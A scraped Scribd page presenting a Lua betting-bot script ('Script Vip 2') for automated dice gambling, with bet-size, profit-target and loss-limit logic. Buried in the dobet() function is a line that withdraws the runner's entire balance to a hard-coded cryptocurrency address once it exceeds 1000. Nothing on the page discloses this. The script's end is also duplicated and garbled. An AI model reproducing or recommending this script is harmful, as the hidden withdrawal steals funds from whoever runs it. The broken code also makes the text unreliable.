0% found this document useful (0 votes)
347 views3 pages

Script Vip 2 (Sfile

This document contains code for a betting script that defines variables for the initial bet amount, profit target, loss limit, and reset conditions. It includes a function called "dobet()" that contains the logic for each bet iteration - adjusting the bet size up or down based on wins/losses, tracking stats, and resetting values when limits are reached.

Uploaded by

Sabardi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
347 views3 pages

Script Vip 2 (Sfile

This document contains code for a betting script that defines variables for the initial bet amount, profit target, loss limit, and reset conditions. It includes a function called "dobet()" that contains the logic for each bet iteration - adjusting the bet size up or down based on wins/losses, tracking stats, and resetting values when limits are reached.

Uploaded by

Sabardi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

chance = math.

random(53,54)
prebet1=0.05
preroll1=0.13
base=prebet1*3.8

prebet=prebet1
preroll=preroll1
nextbet=prebet
betlimit=prebet*20.9
target=balance+9999999999
profittarget=balance+base
initbalance=balance
losslimit=balance*5.90

firstbet=prebet
secondbet=prebet
temp=0
bethigh=true
betcount=0
count=0

resetseed()

function dobet()

betcount+=1
count+=1
betlimit=prebet*500
e=currentstreak+preroll

if !win and (previousbet>firstbet) then


secondbet=firstbet
firstbet=previousbet
end

-- <<Bet Randomizer>>
r=math.random(2)
if r == 1 then
bethigh=true
else
bethigh=false
end
-- <<Bet Randomizer>>

if betcount == 25 then
betcount=0
print("Balance Limit"..string.format("%.8f", initbalance))
print(" ")
print("Profit : "..string.format("%.8f", profit))
print(" ")
end

if count> 500 then


resetseed()
count=0
end

if balance >= profittarget then


print("=====================")
print("PROFIT SET REACHED!!!")
print("Profit : "..string.format("%.8f", profit))
print("Final Balance : "..string.format("%.8f", balance))
print("=====================")
firstbet=prebet
secondbet=prebet
nextbet=prebet
preroll=preroll1
base=prebet*preroll
profittarget=balance+base
losslimit=balance*2.25
end

if balance >= target then


stop()
print("")
print("=====================")
print("TARGET REACHED!!!")
print("Profit : "..string.format("%.8f", profit))
print("Final Balance : "..string.format("%.8f", balance))
print("=====================")
print(" ")
end

if losslimit>balance then
prebet=prebet1*2.99
base=prebet*3.999
losslimit=balance*4.99
else
prebet=prebet1
base=prebet*2
end

if balance > initbalance then


if (balance-initbalance)==0 then
nextbet=prebet
end

if (balance-initbalance)>0 then
nextbet=prebet
end

initbalance=balance
firstbet=prebet
secondbet=prebet
end

if balance < initbalance then

if (initbalance-balance)==prebet then
nextbet=prebet
end

if (initbalance-balance)==(prebet*3.99) then
nextbet=prebet
end

if (initbalance-balance)>(prebet*3.99) then
nextbet=firstbet+secondbet
end

if win and (initbalance>balance) then


nextbet=previousbet
end
end

if (1000<balance)  then
withdraw(balance,'DRNL8fNsWqk29EP1orvaja7xQDT3PfLgpT')
end

if !win and e==2 then


nextbet=previousbet
end

end --End of Dobet


end

if !win and e==2 then


nextbet=previousbet
end

end --End of DobetFile Not Found

You might also like